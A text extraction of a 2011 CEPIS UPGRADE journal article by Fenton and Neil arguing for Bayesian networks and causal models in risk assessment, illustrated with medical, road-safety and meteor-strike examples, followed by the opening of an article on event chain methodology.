„ Risk management journals: <http://www.
riskworld.com/software/sw5sw001.htm>
„
CEPIS UPGRADE Vol. XII, No. 5, December 2011
9
Risk Management
The Use of Bayes and Causal Modelling in Decision Making,
Uncertainty and Risk
Norman Fenton and Martin Neil
The most sophisticated commonly used methods of risk assessment (used especially in the financial sector) involve building statistical models from historical data. Yet such approaches are inadequate when risks are rare or novel because there
is insufficient relevant data. Less sophisticated commonly used methods of risk assessment, such as risk registers, make
better use of expert judgement but fail to provide adequate quantification of risk. Neither the data-driven nor the risk
register approaches are able to model dependencies between different risk factors. Causal probabilistic models (called
Bayesian networks) that are based on Bayesian inference provide a potential solution to all of these problems. Such
models can capture the complex interdependencies between risk factors and can effectively combine data with expert
judgement. The resulting models provide rigorous risk quantification as well as genuine decision support for risk management.
Keywords: Bayes, Bayesian Networks, Causal Models, Risk.
1 Introduction
The 2008-10 credit crisis brought misery to millions
around the world, but it at least raised awareness of the need
for improved methods of risk assessment. The armies of
analysts and statisticians employed by banks and government agencies had failed to predict either the event or its
scale until far too late. Yet the methods that could have
worked – and which are the subject of this paper – were
largely ignored. Moreover, the same methods have the potential to transform risk analysis and decision making in all
walks of life. For example:
· Medical: Imagine you are responsible for diagnosing a condition and for prescribing one of a number of possible treatments. You have some background information
about the patient (some of which is objective like age and
number of previous operations, but some is subjective, like
‘overweight’ and ‘prone to stress’); you also have some prior
information about the prevalence of different possible conditions (for example, bronchitis may be ten times more likely
than cancer). You run some diagnostic tests about which
you have some information of the accuracy (such as the
chances of false negative and false positive outcomes). You
also have various bits of information about the success rates
of the different possible treatments and their side effects.
On the basis of all this information how do you arrive at a
decision of which treatment pathway to take? And how
would you justify that decision if something went wrong?
„ Legal: Anybody involved in a legal case (before or
Authors
Norman Fenton is a Professor in Risk Information Management
at Queen Mary University of London, United Kingdom, and
also CEO of Agena, a company that specialises in risk
management for critical systems. His current work on
quantitative risk assessment focuses on using Bayesian networks.
Norman’s experience in risk assessment covers a wide range of
application domains such as software project risk, legal reasoning
(he has been an expert witness in major criminal and civil cases), medical decision-making, vehicle reliability, embedded
software, transport systems, and financial services. Norman has
published over 130 articles and 5 books on these subjects, and
his company Agena has been building Bayesian Net-based
decision support systems for a range of major clients in support
of these applications. <[email protected]>
Martin Neil is Professor in Computer Science and Statistics at
the School of Electronic Engineering and Computer Science,
Queen Mary, University of London, United Kingdom. He is
also a joint founder and Chief Technology Officer of Agena Ltd
and is Visiting Professor in the Faculty of Engineering and
Physical Sciences, University of Surrey, United Kingdom.
Martin has over twenty years experience in academic research,
teaching, consulting, systems development and project
management and has published or presented over 70 papers in
refereed journals and at major conferences. His interests cover
Bayesian modeling and/or risk quantification in diverse areas:
operational risk in finance, systems and design reliability
(including software), software project risk, decision support,
simulation, AI and statistical learning. He earned a BSc in
Mathematics, a PhD in Statistics and Software Metrics and is a
Chartered Engineer. <[email protected]>
“
The 2008-10 credit crisis brought misery to millions
around the world, but it at least raised awareness
of the need for improved methods of risk assessment
10
CEPIS UPGRADE Vol. XII, No. 5, December 2011
Farewell Edition
”
© Novática
Risk Management
Figure 1: Causal View of Evidence.
during a trial) will see many pieces of evidence. Some of
the evidence favours the prosecution hypothesis of guilty
and some of the evidence favours the defence hypothesis of
innocence. Some of the evidence is statistical (such as the
match probability of a DNA sample) and some is purely
subjective, such as a character witness statement. It is your
duty to combine the value of all of this evidence either to
determine if the case should proceed to trial or to arrive at a
probability (‘beyond reasonable doubt’) of innocence. How
would you arrive at a decision?
„ Safety: A transport service (such as a rail network or
an air traffic control centre) is continually striving to improve safety, but must nevertheless ensure that any proposed
improvements are cost effective and do not degrade efficiency. There are a range of alternative competing proposals for safety improvement, which depend on many different aspects of the current infrastructure (for example, in the
case of an air traffic control centre alternatives may include
new radar, new collision avoidance detection devices, or
improved air traffic management staff training). How do you
determine the ‘best’ alternative taking into account not just
cost but also impact on safety and efficiency of the overall
system? How would you justify any such decision to a team
of government auditors?
„ Financial: A bank needs sufficient liquid capital readily available in the event of exceptionally poor performance,
either from credit or market risk events, or from catastrophic
operational failures of the type that brought down Barings
in 1995 and almost brought down Société Générale in 2007.
It therefore has to calculate and justify a capital allocation
that properly reflects its ‘value at risk’. Ideally this calculation needs to take account of a multitude of current financial indicators, but given the scarcity of previous catastrophic
failures, it is also necessary to consider a range of subjective factors such as the quality of controls in place within
the bank. How can all of this information be combined to
determine the real value at risk in a way that is acceptable to
the regulatory authorities and shareholders?
“
„ Reliability: The success or failure of major new
products and systems often depends on their reliability, as
experienced by end users. Whether it is a high end digital
TV, a software operating system, or a complex military vehicle, like an armoured vehicle, too many faults in the delivered product can lead to financial disaster for the producing company or even a failed military mission including loss of life. Hence, pre-release testing of such systems
is critical. But no system is ever perfect and a perfect system delivered after a competitor gets to the market first may
be worthless. So how do you determine when a system is
‘good enough’ for release, or how much more testing is
needed? You may have hard data in the form of a sequence
of test results, but this has to be considered along with subjective data about the quality of testing and the realism of
the test environment.
What is common about all of the above problems is that
a ‘gut-feel’ decision based on doing all the reasoning ‘in
your head’ or on the back of an envelope is fundamentally
inadequate and increasingly unacceptable. Nor can we base
our decision on purely statistical data of ‘previous’ instances,
since in each case the ‘risk’ we are trying to calculate is
essentially unique in many aspects. To deal with these kinds
of problems consistently and effectively we need a rigorous method of quantifying uncertainty that enables us to
combine data with expert judgement. Bayesian probability, which we introduce in Section 2, is such an approach.
We also explain how Bayesian probability combined with
causal models (Bayesian networks) enables us to factor in
causal relationships and dependencies. In Section 3 we
review standard statistical and other approaches to risk assessment, and argue that a proper causal approach based
on Bayesian networks is needed in critical cases.
2 Bayes Theorem and Bayesian Networks
At their heart, all of the problems identified in Section
1 incorporate the basic causal structure shown in Figure 1.
There is some unknown hypothesis H about which we
wish to assess the uncertainty and make some decision. Does
the patient have the particular disease? Is the defendant
guilty of the crime? Will the system fail within a given period of time? Is a capital allocation of 5% going to be sufficient to cover operational losses in the next financial year?
Consciously or unconsciously we start with some (unconditional) prior belief about H (for example, ‘there is a 1
in a 1000 chance this person has the disease’). Then we
update our prior belief about H once we observe evidence
‘Gut-feel’ decision based on doing all the reasoning
‘in your head’ or on the back of an envelope is fundamentally
inadequate and increasingly unacceptable
© Novática
”
Farewell Edition
CEPIS UPGRADE Vol. XII, No. 5, December 2011
11
Risk Management
“
Bayesian probability is a rigorous method
of quantifying uncertainty that enables us to combine data
with expert judgement
E (for example, depending on the outcome of a test our
belief about H being true might increase or decrease). This
updating takes account of the likelihood of the evidence,
which is the chance of seeing the evidence E if H is true.
When done formally this type of reasoning is called
Bayesian inference, named after Thomas Bayes who determined the necessary calculations for it in 1763. Formally,
we start with a prior probability P(H) for the hypothesis H.
The likelihood, for which we also have prior knowledge, is
formally the conditional probability of E given H, which
we write as P(E|H).
Bayes’s theorem provides the correct formula for updating our prior belief about H in the light of observing E.
In other words Bayes calculates P(H|E) in terms of P(H)
and P(E|H). Specifically:
P( H | E ) =
P( E | H ) P( H )
P( E | H ) P( H )
=
P( E )
P( E | H ) P( H ) + ( E | notH ) P(notH )
Example 1: Assume one in a thousand people has a particular disease H. Then:
P(H) = 0.001, so P(not H) = 0.999
Also assume a test to detect the disease has 100% sensitivity (i.e. no false negatives) and 95% specificity (meaning 5% false positives). Then if E represents the Boolean
variable "Test positive for the disease", we have:
P(E | not H) = 0.05
P(E | H) = 1
Now suppose a randomly selected person tests positive.
What is the probability that the person actually has the disease? By Bayes Theorem this is:
P( H | E ) =
Indeed, in a classic study [3] when Harvard Medical School
staff and students were asked to calculate the probability of
the patient having the disease (using the exact assumptions
stated in Example 1) most gave the wildly incorrect answer
of 95% instead of the correct answer of less than 2%. The
potential implications of such incorrect ‘probabilistic risk
assessment’ are frightening. In many cases, lay people only
accept Bayes theorem as being ‘correct’ and are able to reason correctly, when the information is presented in alternative graphical ways, such as using event trees and frequencies (see [4] and [5] for a comprehensive investigation of
these issues). But these alternative presentation techniques
do not scale up to more complex problems.
If Bayes theorem is difficult for lay people to compute
and understand in the case of a single hypothesis and piece
of evidence (as in Figure 1), the difficulties are obviously
compounded when there are multiple related hypotheses
and evidence as in the example of Figure 2.
As in Figure 1 the nodes in Figure 2 represent variables
(which may be known or unknown) and the arcs represent
causal (or influential) relationships. Once we have relevant
prior and conditional probabilities associated with each variable (such as the examples shown in Figure 3) the model is
called a Bayesian network (BN).
The BN in Figure 2 is intended to model the problem of
diagnosing diseases (TB, Cancer, Bronchitis) in patients
attending a chest clinic. Patients may have symptoms (like
dyspnoea – shortness of breath) and can be sent for diagnostic tests (X-ray); there may be also underlying causal
P ( E | H ) P( H )
1× 0.001
=
= 0.01963
P( E | H ) P ( H ) + ( E | notH ) P(notH ) 1× 0.001 + 0.05 × 0.999
So there is a less than 2% chance that a person testing
positive actually has the disease.
Bayes theorem has been used for many years in numerous applications ranging from insurance premium calculations [1], through to web-based personalisation (such as with
Google and Amazon). Many of the applications pre-date
modern computers (see, e.g. [2] for an account of the crucial role of Bayes theorem in code breaking during World
War 2).
However, while Bayes theorem is the only rational way
of revising beliefs in the light of observing new evidence, it
is not easily understood by people without a statistical/mathematical background. Moreover, the results of Bayesian
calculations can appear, at first sight, as counter-intuitive.
12
”
CEPIS UPGRADE Vol. XII, No. 5, December 2011
Figure 2: Bayesian Network for Diagnosing Disease.
Farewell Edition
© Novática
Risk Management
Probability Table for “Visit to Asia?”
Probability Table for “Bronchitis?”
Figure 3: Node Probability Table (NPT) Examples.
factors that influence certain diseases more than others (such
as smoking, visit to Asia).
To use Bayesian inference properly in this type of network necessarily involves multiple applications of Bayes
Theorem in which evidence is ‘propagated’ throughout. This
process is complex and quickly becomes infeasible when
there are many nodes and/or nodes with multiple states. This
complexity is the reason why, despite its known benefits,
there was for many years little appetite to use Bayesian inference to solve real-world decision and risk problems. For-
a) Prior beliefs point to bronchitis as most likely
c) Positive x-ray result increases probability of TB and
cancer but bronchitis still most likely
tunately, due to breakthroughs in the late 1980s that produced efficient calculations algorithms 13 [2][6], there are
now widely available tools such as [7] that enable anybody
to do the Bayesian calculations without ever having to understand, or even look at, a mathematical formula. These
developments were the catalyst for an explosion of interest
in BNs. Using such a tool we can do the kind of powerful
reasoning shown in Figure 4.
Specifically:
„ With the prior assumptions alone (Figure 4a) Bayes
b) Patient is ‘non-smoker’ experiencing dyspnoea
(shortness of breath): strengthens belief in bronchitis
d) Visit to Asia makes TB most likely now
Figure 4: Reasoning within the Bayesian Network.
© Novática
Farewell Edition
CEPIS UPGRADE Vol. XII, No. 5, December 2011
13
Risk Management
“
The results of Bayesian
calculations can appear,
at first sight, as
counter-intuitive
”
theorem computes what are called the prior marginal probabilities for the different disease nodes (note that we did not
‘specify’ these probabilities – they are computed automatically; what we specified were the conditional probabilities
of these diseases given the various states of their parent
nodes). So, before any evidence is entered the most likely
disease is bronchitis (45%).
„ When we enter evidence about a particular patient
the probabilities for all of the unknown variables get updated by the Bayesian inference. So, (in Figure 4b) once we
enter the evidence that the patient has dyspnoea and is a
non-smoker, our belief in bronchitis being the most likely
disease increases (75%).
„ If a subsequent X-ray test is positive (Figure 4b) our
belief in both TB (26%) and cancer (25%) are raised but
bronchitis is still the most likely (57%).
„ However, if we now discover that the patient visited
Asia (Figure 4d) we overturn our belief in bronchitis in favour of TB (63%).
Note that we can enter any number of observations anywhere in the BN and update the marginal probabilities of all
the unobserved variables. As the above example demonstrates, this can yield some exceptionally powerful analyses
that are simply not possible using other types of reasoning
and classical statistical analysis methods.
In particular, BNs offer the following benefits:
„ Explicitly model causal factors:
„ Reason from effect to cause and vice versa
„ Overturn previous beliefs in the light of new evidence
(also called ‘explaining away’)
„ Make predictions with incomplete data
„ Combine diverse types of evidence including both
subjective beliefs and objective data.
Month
January
February
March
April
May
June
July
August
September
October
November
December
Total fatal crashes
297
280
267
350
328
386
419
410
331
356
326
311
„ Arrive at decisions based on visible auditable reasoning (Unlike black-box modelling techniques there are
no "hidden" variables and the inference mechanism is based
on a long-established theorem).
With the advent of the BN algorithms and associated
tools, it is therefore no surprise that BNs have been used in
a range of applications that were not previously possible
with Bayes Theorem alone. A comprehensive (and easily
accessible) overview of BN applications, with special emphasis on their use in risk assessment, can be found in [8].
It is important to recognise that the core intellectual overhead in using the BN approach is in defining the model
structure and the NPTs – the actual Bayesian calculations
can and must always be carried out using a tool. However,
while these tools enable large-scale BNs to be executed efficiently, most provide little or no support for users to actually build large-scale BNs, nor to interact with them easily.
Beyond a graphical interface for building the structure, BNbuilders are left to struggle with the following kinds of practical problems that combine to create a barrier to the more
widespread use of BNs:
„ Eliciting and completing the probabilities in very large
NPTs manually (e.g. for a node with 5 states having three parents each with 5 states, the NPT requires 625 entries);
„ Dealing with very large graphs that contain similar,
but slightly different "patterns" of structure ;
„ Handling continuous, as well as discrete variables.
Fortunately, recent algorithm and tool developments (also
described in [8]) have gone a long way to addressing these
problems and may lead to a ‘second wave’ of widespread BN
applications. But before BNs are used more widely in critical
risk assessment and decision making, there needs to be a fundamental cultural shift away from the current standard approaches to risk assessment, which we address next.
3 From Statistical Models and Risk Registers to
Causal Models
3.1 Prediction based on Correlation is not Risk
Assessment
Standard statistical approaches to risk assessment seek
Average monthly temperature (F)
17.0
18.0
29.0
43.0
55.0
65.0
70.0
68.0
59.0
48.0
37.0
22.0
Table 1: Fatal Automobile Crashes per Month.
14
CEPIS UPGRADE Vol. XII, No. 5, December 2011
Farewell Edition
© Novática
Risk Management
Figure 5: Scatterplot of Temperature against Road Fatalities (each Dot represents a Month).
to establish hypotheses from relationships discovered in
data. Suppose we are interested, for example, in the risk of
fatal automobile crashes. Table 1 gives the number of crashes
resulting in fatalities in the USA in 2008 broken down by
month (source: US National Highways Traffic Safety Administration). It also gives the average monthly temperature.
We plot the fatalities and temperature data in a scatterplot
graph as shown in Figure 5.
There seems to be a clear relationship between temperature and fatalities – fatalities increase as the temperature
increases. Indeed, using the standard statistical tools of correlation and p-values, statisticians would accept the hypothesis of a relationship as ‘highly significant’ (the correlation
Figure 6: Causal Model for Fatal Crashes.
© Novática
Farewell Edition
CEPIS UPGRADE Vol. XII, No. 5, December 2011
15
Risk Management
coefficient here is approximately 0.869 and it comfortably
passes the criteria for a p-value of 0.01).
However, in addition to serious concerns about the use
of p-values generally (as described comprehensively in [6]),
there is an inevitable temptation arising from such results
to infer causal links such as, in this case, higher temperatures cause more fatalities. Even though any introductory statistics course teaches that correlation is not causation, the regression equation is typically used for prediction (e.g. in this
case the equation relating N to T is used to predict that at 80F
we might expect to see 415 fatal crashes per month).
But there is a grave danger of confusing prediction with
risk assessment. For risk assessment and management the
regression model is useless, because it provides no explanatory power at all. In fact, from a risk perspective this model
would provide irrational, and potentially dangerous, information: it would suggest that if you want to minimise your
chances of dying in an automobile crash you should do your
driving when the highways are at their most dangerous, in
winter.
One obvious improvement to the model, if the data is
available, is to factor in the number of miles travelled (i.e.
journeys made). But there are other underlying causal and
influential factors that might do much to explain the apparently strange statistical observations and provide better
insights into risk. With some common sense and careful
reflection we can recognise the following:
„ Temperature influences the highway conditions
(which will be worse as temperature decreases).
„ Temperature also influences the number of journeys
made; people generally make more journeys in spring and
summer and will generally drive less when weather conditions are bad.
„ When the highway conditions are bad people tend
to reduce their speed and drive more slowly. So highway
conditions influence speed.
„ The actual number of crashes is influenced not just by
the number of journeys, but also the speed. If relatively few
people are driving, and taking more care, we might expect fewer
fatal crashes than we would otherwise experience.
The influence of these factors is shown in Figure 6:
The crucial message here is that the model no longer
involves a simple single causal explanation; instead it combines the statistical information available in a database (the
‘objective’ factors) with other causal ‘subjective’ factors derived from careful reflection. These factors now interact in
a non-linear way that helps us to arrive at an explanation
for the observed results. Behaviour, such as our natural cau-
tion to drive slower when faced with poor road conditions,
leads to lower accident rates (people are known to adapt to
the perception of risk by tuning the risk to tolerable levels.
- this is formally referred to as risk homeostasis). Conversely, if we insist on driving fast in poor road conditions
then, irrespective of the temperature, the risk of an accident increases and so the model is able to capture our intuitive beliefs that were contradicted by the counterintuitive
results from the simple regression model.
The role played in the causal model by driving speed
reflects human behaviour. The fact that the data on the average speed of automobile drivers was not available in a
database explains why this variable, despite its apparent
obviousness, did not appear in the statistical regression
model. The situation whereby a statistical model is based
only on available data, rather than on reality, is called "conditioning on the data". This enhances convenience but at
the cost of accuracy.
By accepting the statistical model we are asked to defy
our senses and experience and actively ignore the role unobserved factors play. In fact, we cannot even explain the
results without recourse to factors that do not appear in the
database. This is a key point: with causal models we seek
to dig deeper behind and underneath the data to explore
richer relationships missing from over-simplistic statistical
models. In doing so we gain insights into how best to control risk and uncertainty. The regression model, based on
the idea that we can predict automobile crash fatalities based
on temperature, fails to answer the substantial question: how
can we control or influence behaviour to reduce fatalities.
This at least is achievable; control of weather is not.
3.2 Risk Registers do not help quantify Risk
While statistical models based on historical data represent one end of a spectrum of sophistication for risk assessment, at the other end is the commonly used idea of a ‘risk
register’. In this approach, there is no need for past data; in
considering the risks of a new project risk managers typically prepare a list of ‘risks’ that could be things like:
„ Some key people you were depending on become
unavailable
„ A piece of technology you were depending on fails.
„ You run out of funds or time
The very act of listing and then prioritising risks, means
that mentally at least risk managers are making a decision
about which risks are the biggest. Most standard texts on
risk propose decomposing each risk into two components:
„ ‘Probability’ (or likelihood) of the risk
Figure 7: Standard Impact-based Risk Measure.
16
CEPIS UPGRADE Vol. XII, No. 5, December 2011
Farewell Edition
© Novática
Risk Management
An Example: Meteor Strike Alarm in the Film "Armageddon"
By destroying the meteor in the film "Armageddon" Bruce Willis saved the world. Both the chance of the meteor strike
and the consequences of such a strike were so high, that nothing much else mattered except to try to prevent the strike.
In popular terminology what the world was confronting was a truly massive ‘risk’. But if the NASA scientists in the film
had measured the size of the risk using the formula in Figure 7 they would have discovered such a measure was
irrational, and it certainly would not have explained to Bruce Willis and his crew why their mission made sense. Specifically:
„ Cannot get the Probability number (for meteor strikes earth). According to the NASA scientists in the film the
meteor was on a direct collision course with earth. Does that make it a certainty (i.e. a 100% chance) of it striking Earth?
Clearly not, because if it was then there would have been no point in sending Bruce Willis and his crew up in the space
shuttle. The probability of the meteor striking Earth is conditional on a number of control events (like intervening to
destroy the meteor) and trigger events (like being on a collision course with Earth). It makes no sense to assign a direct
probability without considering the events it is conditional on. In general it makes no sense (and would in any case be
too difficult) for a risk manager to give the unconditional probability of every ‘risk’ irrespective of relevant
controls and triggers. This is especially significant when there are, for example, controls that have never been used
before (like destroying the meteor with a nuclear explosion).
„ Cannot get the Impact number (for meteor striking earth). Just as it makes little sense to attempt to assign an
(unconditional) probability to the event "Meteor strikes Earth’, so it makes little sense to assign an (unconditional)
number to the impact of the meteor striking. Apart from the obvious question "impact on what?", we cannot say what the
impact is without considering the possible mitigating events such as getting people underground and as far away as
possible from the impact zone.
„ Risk score is meaningless. Even if we could get round the two problems above what exactly does the resulting
number mean? Suppose the (conditional) probability of the strike is 0.95 and, on a scale of 1 to 10, the impact of the
strike is 10 (even accounting for mitigants). The meteor ‘risk’ is 9.5, which is a number close to the highest possible 10.
But it does not measure anything in a meaningful sense
„ It does not tell us what we really need to know. What we really need to know is the probability, given our current
state of knowledge, that there will be massive loss of life.
„
‘Impact’ (or loss) the risk can cause
The most common way to measure each risk is to multiply the probability of the risk (however you happen to measure that) with the impact of the risk (however you happen to
measure that) as in Figure 7.
The resulting number is the ‘size’ of the risk - it is based
on analogous ‘utility’ measures. This type of risk measure
is quite useful for prioritising risks (the bigger the number
the ‘greater’ the risk) but it is normally impractical and can
be irrational when applied blindly. We are not claiming that
this formulation is wrong. Rather, we argue that it is normally not sufficient for decision-making.
One immediate problem with the risk measure of Figure
7 is that, normally, you cannot directly get the numbers you
need to calculate the risk without recourse to a much more
detailed analysis of the variables involved in the situation at
hand.
In addition to the problem of measuring the size of each
individual risk in isolation, risk registers suffer from the
following problems:
“
By destroying
the meteor in the film
'Armageddon' Bruce Willis
saved the world
”
© Novática
Farewell Edition
Figure 8: Meteor Strike Risk.
„ However the individual risk size is calculated, the
cumulative risk score measures the total project risk. Hence,
there is a paradox involved in such an approach: the more
carefully you think about risk (and hence the more individual risks you record in the risk register) the higher the
overall risk score becomes. Since higher risk scores are assumed to indicate greater risk of failure it seems to follow
that your best chance of a new project succeeding is to simply ignore, or under-report, any risks.
CEPIS UPGRADE Vol. XII, No. 5, December 2011
17
Risk Management
Figure 9: Conditional Probability Table for "Meteor strikes Earth".
„ Different projects or business divisions will assess
risk differently and tend to take a localised view of their
own risks and ignore that of others. This "externalisation"
of risk to others is especially easy to ignore if their interests
are not represented when constructing the register. For example the IT department may be forced to accept the deadlines imposed by the marketing department.
„ A risk register does not record "opportunities" or "serendipity" and so does not deal with upside uncertainty, only
downside.
„ Risks are not independent. For example, in most circumstances cost, time and quality will be inextricably linked;
you might be able to deliver faster but only by sacrificing
quality. Yet "poor quality" and "missed delivery" will appear as separate risks on the register giving the illusion that
we can control or mitigate one independently of the other.
In the subprime loan crisis of 2008 there were three risks:
Figure 10: Probability Table for
"Meteor on Collision Course with
Earth".
1) extensive defaults on subprime loans, 2) growth in novelty and complexity of financial products and 3) failure of
AIG (American International Group Inc.) to provide insurance to banks when customers default. Individually these
risks were assessed as ‘small’. However, when they occurred
together the total risk was much larger than the individual
risks. In fact, it never made sense to consider the risks individually at all.
Hence, risk analysis needs to be coupled with an assessment of the impact of the underlying events, one on
another, and in terms of their effect on the ultimate outcomes being considered. The accuracy of the risk assessment
is crucially dependent on the fidelity of the underlying model;
the simple formulation of Figure 7 is insufficient. Instead of
going through the motions to assign numbers without actually
doing much thinking, we need to consider what lies under the
bonnet.
Figure 11: Initial Risk of Meteor Strike.
18
CEPIS UPGRADE Vol. XII, No. 5, December 2011
Farewell Edition
© Novática
Risk Management
Figure 12: The Potential Difference made by Bruce Willis and Crew.
Risk is a function of how closely connected events, systems and actors in those systems might be. Proper risk assessment requires a holistic outlook that embraces a causal
view of interconnected events. Specifically to get rational
measures of risk you need a causal model, as we describe
next. Once you do this measuring risk starts to make sense,
but it requires an investment in time and thought.
3.2.1 Thinking about Risk using Causal Analysis
It is possible to avoid all the above problems and ambiguities surrounding the term risk by considering the causal context in which risks happen (in fact everything we present here
applies equally to opportunities but we will try to keep it as
simple as possible). The key thing is that a risk is an event that
can be characterised by a causal chain involving (at least):
„ the event itself
„ at least one consequence event that characterises the
impact
„ one or more trigger (i.e. initiating) events
„ one or more control events which may stop the trigger event from causing the risk event
„ one or more mitigating events which help avoid the
consequence event
“
This is shown in the example of Figure 8.
With this causal perspective, a risk is therefore actually
characterised not by a single event, but by a set of events.
These events each have a number of possible outcomes (to
keep things as simple as possible in the example here we
will assume each has just two outcomes true and false so
we can assume "Loss of life" here means something like
‘loss of at least 80% of the world population’).
The ‘uncertainty’ associated with a risk is not a separate notion (as assumed in the classic approach). Every event
(and hence every object associated with risk) has uncertainty that is characterised by the event’s probability distribution. Triggers, controls, and mitigants are all inherently
uncertain. The sensible risk measures that we are proposing are simply the probabilities you get from running the
BN model. Of course, before you can run it you still have
to provide the prior probability values. But, in contrast to
the classic approach, the probability values you need to supply are relatively simple and they make sense. And you
never have to define vague numbers for ‘impact’.
Example. To give you a feel of what you would need to
do, in the Armageddon BN example of Figure 8 for the
uncertain event "Meteor strikes Earth" we still have to as-
Proper risk assessment requires a holistic outlook
that embraces a causal view of interconnected events
© Novática
”
Farewell Edition
CEPIS UPGRADE Vol. XII, No. 5, December 2011
19
Risk Management
Figure 13: Incorporating Different Risk Perspectives.
sign some probabilities. But instead of second guessing what
this event actually means in terms of other conditional
events, the model now makes it explicit and it becomes much
easier to define the necessary conditional probability. What
we need to do is define the probability of the meteor strike
given each combination of parent states as shown in Figure
9.
For example, if the meteor is on a collision course then
the probability of it striking the earth is 1, if it is not destroyed, and 0.2, if it is. In completing such a table we no
longer have to try to ‘factor in’ any implicit conditioning
events like the meteor trajectory.
There are some events in the BN for which we do need
to assign unconditional probability values. These are represented by the nodes in the BN that have no parents; it makes
sense to get unconditional probabilities for these because,
by definition, they are not conditioned on anything (this is
obviously a choice we make during our analysis). Such
nodes can generally be only triggers, controls or mitigants.
An example, based on dialogue from the film, is shown in
Figure 10.
Once we have supplied the priors probability values a
BN tool will run the model and generate all the measures of
risk that you need. For example, when you run the model
using only the initial probabilities the model (as shown in
Figure 11) computes the probability of the meteor striking
Earth as 99.1% and the probability of loss of life (meaning
at least 80% of the world population) is about 94%.
In terms of the difference that Bruce Willis and his crew
could make we run two scenarios: One where the meteor is
20
CEPIS UPGRADE Vol. XII, No. 5, December 2011
exploded and one where it is not. The results of both scenarios are shown together in Figure 12.
Reading off the values for the probability of "loss of
life" being false we find that we jump from just over 4%
(when the meteor is not exploded) to 81% (when the meteor is exploded). This massive increase in the chance of
saving the world clearly explains why it merited an attempt.
Clearly risks in this sense depend on stakeholders and
perspectives, but these perspectives can be easily combined
as shown in Figure 13 for ‘flood risk’ in some town.
The types of events are all completely interchangeable
depending on the perspective. From the perspective of the
local authority the risk event is ‘Flood’ whose trigger is ‘dam
bursts upstream’ and which has ‘flood barrier’ as a control.
Its consequences include ‘loss of life’ and also ‘house
floods’. But the latter is a trigger for flood risk from a Householder perspective. From the perspective of the Local Authority Solicitor the main risk event is ‘Loss of life’ for
which ‘Flood’ is the trigger and ‘Rapid emergency response’
becomes a control rather than a mitigant.
This ability to decompose a risk problem into chains of
interrelated events and variables should make risk analysis
more meaningful, practical and coherent. The BN tells a
story that makes sense. This is in stark contrast with the
"risk equals probability times impact" approach where not
one of the concepts has a clear unambiguous interpretation.
Uncertainty is quantified and at any stage we can simply
read off the current probability values associated with any
event.
The causal approach can accommodate decision-mak-
Farewell Edition
© Novática
Risk Management
ing as well as measures of utility. It provides a visual and
formal mechanism for recording and testing subjective probabilities. This is especially important for a risky event for
which you do not have much or any relevant data.
4 Conclusions
We have addressed some of the core limitations of both
a) the data-driven statistical approaches and b) risk registers, for effective risk management and assessment. We have
demonstrated how these limitations are addressed by using
BNs. The BN approach helps to identify, understand and
quantify the complex interrelationships (underlying even
seemingly simple situations) and can help us make sense of
how risks emerge, are connected and how we might represent our control and mitigation of them. By thinking about
the hypothetical causal relations between events we can investigate alternative explanations, weigh up the consequences of our actions and identify unintended or
(un)desirable side effects.
Of course it takes effort to produce a sensible BN model:
„ Special care has to be taken to identify cause and
effect: in general, a significant correlation between two factors A and B (where, for example A is ‘yellow teeth’ and B
is ‘cancer’) could be due to pure coincidence or a causal
mechanism, such that:
- A causes B
- B causes A
- Both A and B are caused by C (where in our example
C might be ‘smoking’) or some other set of factors
The difference between these possible mechanisms is
crucial in interpreting the data, assessing the risks to the
individual and society, and setting policy based on the analysis of these risks. In practice causal interpretation may collide with our personal view of the world and the prevailing
ideology of the organisation and social group, of which we
will be a part. Explanations consistent with the ideological
viewpoint of the group may be deemed more worthy and
valid than others irrespective of the evidence. Hence simplistic causal explanations (e.g. ‘poverty’ causes ‘violence’)
are sometimes favoured by the media and reported unchallenged. This is especially so when the explanation fits the
established ideology helping to reinforce ingrained beliefs.
Picking apart over-simplistic causal claims and reconstructing them into a richer, more realistic causal model helps
separate ideology from reality and determine whether the
model explains reality. The richer model may then also help
identify more realistic possible policy interventions.
„ The states of variables need to be carefully defined
and probabilities need to be assigned that reflect our best
knowledge.
„ It requires an analytical mindset to decompose the
problem into "classes" of event and relationships that are
granular enough to be meaningful, but not too detailed that
they are overwhelming.
If we were omniscient we would have no need of probabilities; the fact that we are not gives rise to our need to
model uncertainty at a level of detail that we can grasp, that
© Novática
Farewell Edition
is useful and which is accurate enough for the purpose required. This is why causal modelling is as much an art (but
an art based on insight and analysis) as a science.
The time spent analysing risks must be balanced by the
short term need to take action and the magnitude of the
risks involved. Therefore, we must make judgements about
how deeply we model some risks and how quickly we use
this analysis to inform our actions.
References
[1] S.L. Lauritzen, D.J. Spiegelhalter. Local computations
with probabilities on graphical structures and their
application to expert systems (with discussion). Journal of the Royal Statistical Society Series 50(2), 157224 (1988).
[2] I.B. Hossack, J. H. Pollard, B. Zehnwirth. Introductory statistics with applications in general insurance,
Cambridge University Press, 1999.
[3] W. Casscells, A. Schoenberger, T.B. Graboys. "Interpretation by physicians of clinical laboratory results."
New England Journal of Medicine 299 999-1001,
1978.
[4] L. Cosmides, J. Tooby. "Are humans good intuitive
statisticians after all? Rethinking some conclusions
from the literature on judgment under uncertainty."
Cognition 58 1-73, 1996.
[5] N. Fenton, M. Neil (2010). "Comparing risks of alternative medical diagnosis using Bayesian arguments."
Journal of Biomedical Informatics 43: 485-495.
[6] J. Pearl. "Fusion, propagation, and structuring in belief networks." Artificial Intelligence 29(3): 241-288,
1986.
[7] Agena 2010, <http://www.agenarisk.com>.
[8] N.E. Fenton, M. Neil. Managing Risk in the Modern
World: Bayesian Networks and the Applications. London Mathematical Society, Knowledge Transfer Report. 1, 2007. <http://www.lms.ac.uk/activities/
comp_sci_com/KTR/apps_bayesian_networks.pdf>.
CEPIS UPGRADE Vol. XII, No. 5, December 2011
21
Risk Management
Event Chain Methodology in Project Management
Michael Trumper and Lev Virine
Risk management has become a critical component of project management processes. Quantitative schedule risk analysis methods enable project managers to assess how risks and uncertainties will affect project schedules and increase the
effectiveness of their project planning. Event chain methodology is an uncertainty modeling and schedule network analysis technique that focuses on identifying and managing the events and event chains that affect projects. Event chain
methodology improves the accuracy of project planning by simplifying the modeling and analysis of risks and uncertainties in the project schedules. As a result, it helps to mitigate the negative impact of cognitive and motivational biases
related to project planning. Event chain methodology is currently used in many organizations as part of their project risk
management process.
Keywords: Project Management, Project Scheduling,
Quantitative Methods, Schedule Network Analysis.
1 Why Project Managers ignore Risks in Project
Schedules
Virtually all projects are affected by multiple risks and
uncertainties. These uncertainties are difficult to identify and
analyze which can lead to inaccurate project schedules. Due
to these inherent uncertainties, most projects do not proceed exactly as planned and, in many cases, they lead to
